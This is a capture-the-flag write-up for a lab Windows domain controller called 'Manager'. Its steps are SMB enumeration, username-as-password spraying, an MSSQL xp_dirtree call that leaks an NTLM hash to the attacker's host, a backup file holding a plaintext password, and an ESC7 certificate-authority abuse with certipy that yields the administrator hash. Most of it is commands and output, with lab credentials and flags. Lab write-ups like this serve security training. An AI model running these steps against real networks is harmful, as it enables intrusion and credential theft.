Manager

Recon

DNS (53)

└─$ dig ANY manager.htb @10.129.251.108 +tcp | grep -vE ';|^$'
manager.htb.            600     IN      A       10.129.251.108
manager.htb.            600     IN      A       10.10.11.236
manager.htb.            3600    IN      NS      dc01.manager.htb.
manager.htb.            3600    IN      SOA     dc01.manager.htb. hostmaster.manager.htb. 247 900 600 86400 3600
dc01.manager.htb.       3600    IN      A       10.129.251.108

HTTP (80)

The site is serving static html, no subdomain was found with ffuf

└─$ domain='manager.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 507

SMB

└─$ netexec smb manager.htb -u '' -p '' --shares
SMB         10.129.251.108  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.251.108  445    DC01             [+] manager.htb\:
SMB         10.129.251.108  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
└─$ netexec smb manager.htb -u 'anonymous' -p '' --shares
SMB         10.129.251.108  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.251.108  445    DC01             [+] manager.htb\anonymous:
SMB         10.129.251.108  445    DC01             [*] Enumerated shares
SMB         10.129.251.108  445    DC01             Share           Permissions     Remark
SMB         10.129.251.108  445    DC01             -----           -----------     ------
SMB         10.129.251.108  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.251.108  445    DC01             C$                              Default share
SMB         10.129.251.108  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.251.108  445    DC01             NETLOGON                        Logon server share
SMB         10.129.251.108  445    DC01             SYSVOL                          Logon server share
└─$ netexec smb manager.htb -u 'anonymous' -p '' --rid-brute | tee users_rid.log
SMB         10.129.251.108  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.251.108  445    DC01             [+] manager.htb\anonymous:
SMB         10.129.251.108  445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.251.108  445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.129.251.108  445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.129.251.108  445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.129.251.108  445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.129.251.108  445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.129.251.108  445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.129.251.108  445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.129.251.108  445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.129.251.108  445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.129.251.108  445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.129.251.108  445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.129.251.108  445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.251.108  445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.251.108  445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.251.108  445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.129.251.108  445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.129.251.108  445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.251.108  445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.251.108  445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.251.108  445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.251.108  445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.129.251.108  445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.129.251.108  445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.251.108  445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.129.251.108  445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.129.251.108  445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.129.251.108  445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.129.251.108  445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.129.251.108  445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.129.251.108  445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.129.251.108  445    DC01             1119: MANAGER\Operator (SidTypeUser)
└─$ grep SidTypeUser users_rid.log |  awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

Bruteforce the passwords with usernames

└─$ cat users.txt | tr 'A-Z' 'a-z' >> users.txt
└─$ netexec smb manager.htb -u users.txt -p users.txt --no-bruteforce
SMB         10.129.251.108  445    DC01             [+] manager.htb\operator:operator

Enumerate DC

└─$ faketime -f +7h cicada-mastertul -t '10.129.251.108' -u 'operator' -p 'operator' -d 'manager.htb'      
[!x!] Scanning 10.129.251.108
[!] Enumerating SMB...
 netexec smb 10.129.251.108 -u 'operator' -p 'operator' --shares
[-] Could not connect to SMB
[!] Connecting to WinRM...
 netexec winrm 10.129.251.108 -u 'operator' -p 'operator'
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/ldap_results
 [!x!] Cleaning up...

Raven can winrm in to the machine, so the account is desired target.

MSSQL

Bloodhound didn't show any outbound permissions, but we have access to MSSQL

└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator'
MSSQL       10.129.251.108  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.129.251.108  1433   DC01             [+] manager.htb\operator:operator

Command execution is disabled

└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -M mssql_priv -o ACTION=privesc
MSSQL       10.129.251.108  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.129.251.108  1433   DC01             [+] manager.htb\operator:operator
MSSQL_PRIV  10.129.251.108  1433   DC01             [+] MANAGER\Operator is sysadmin
MSSQL_PRIV  10.129.251.108  1433   DC01             [+] MANAGER\Operator is now a sysadmin! (Pwn3d!)
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -x whoami
MSSQL       10.129.251.108  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.129.251.108  1433   DC01             [+] manager.htb\operator:operator

Hash caught by responder is not crackable

└─$ sudo responder -I tun0
---
└─$ impacket-mssqlclient 'MANAGER.HTB'/'operator':'operator'@'10.129.251.108' -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (MANAGER\Operator  guest@master)> xp_dirtree \\10.10.14.113\x
...
[SMB] NTLMv2-SSP Client   : 10.129.251.108
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::MANAGER:1298c7446bb71623:7E834EEFE336C155DB7EE552CBE76A41:010100000000000000DB934E5E48DB01AA71E8B1321E2B79000000000200080048004A005400560001001E00570049004E002D004100560045005600520034005900450056005000480004003400570049004E002D00410056004500560052003400590045005600500048002E0048004A00540056002E004C004F00430041004C000300140048004A00540056002E004C004F00430041004C000500140048004A00540056002E004C004F00430041004C000700080000DB934E5E48DB0106000400020000000800300030000000000000000000000000300000D167A1BC4215133E40EB79E0D32D161C6C1A5048EBEB9A1A819856EC8041ACCA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310033000000000000000000
[+] Exiting...

We became sysadmin by netexec, but still no permissions to enable xp_cmdshell

SQL (MANAGER\Operator  guest@master)> enable_xp_cmdshell
ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Enumerate with xp_dirtree

SQL (MANAGER\Operator  guest@master)> xp_dirtree \inetpub\wwwroot
[%] exec master.sys.xp_dirtree '\inetpub\wwwroot',1,1
subdirectory                      depth   file
-------------------------------   -----   ----
about.html                            1      1
contact.html                          1      1
css                                   1      0
images                                1      0
index.html                            1      1
js                                    1      0
service.html                          1      1
web.config                            1      1
website-backup-27-07-23-old.zip       1      1

We can download the backup file available on webserver.

└─$ curl -LOs 'http://10.129.251.108/website-backup-27-07-23-old.zip'
└─$ unzip website-backup-27-07-23-old.zip -d backup

Creds: raven:R4v3nBe5tD3veloP3r!123

WinRM

└─$ evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami /all
User Name     SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\Raven\Documents> cat ../Desktop/user.txt
00ea5f4486bf2455ff7c7f0a69cd3308

Privilege Escalation

Still nothing from Bloodhound

└─$ faketime -f +7h bloodhound-python -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -d 'manager.htb' -c All -ns 10.129.251.108 -dc dc01.manager.htb --zip -op raven

Enumerate certificates on DC

└─$ certipy-ad find -vulnerable -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc7 https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-authority-esc7

└─$ USER='raven'
PASSWORD='R4v3nBe5tD3veloP3r!123'
DOMAIN='manager.htb'
TEMPLATE='manager-DC01-CA'

└─$ ccertipy-ad ca -ca "$TEMPLATE" -add-officer "$USER" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad ca -ca "$TEMPLATE" -enable-template "SubCA" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$TEMPLATE" -target "$DOMAIN" -template "SubCA" -upn "administrator@$DOMAIN"
certipy-ad ca -ca "$TEMPLATE" -issue-request 21 -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$TEMPLATE" -target "$DOMAIN" -retrieve 21
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'

Get the NTLM hash for user and fix clock skew

└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

└─$ sudo ntpdate manager.htb
2024-12-07 11:56:44.712756 (-0500) +25198.083861 +/- 0.040104 manager.htb 10.129.251.108 s1 no-leap
CLOCK: time stepped by 25198.083861
└─$ echo $(( 25198.083861 / 3600 ))
6.9994677391666666
└─$ faketime -f +7h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
57e674457bce72947459f144c4987aa3

PreviousHospital NextSurveillance

Last updated 7 months ago

hashtagRecon

hashtagDNS (53)

hashtagHTTP (80)

hashtagSMB

hashtagMSSQL

hashtagWinRM

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt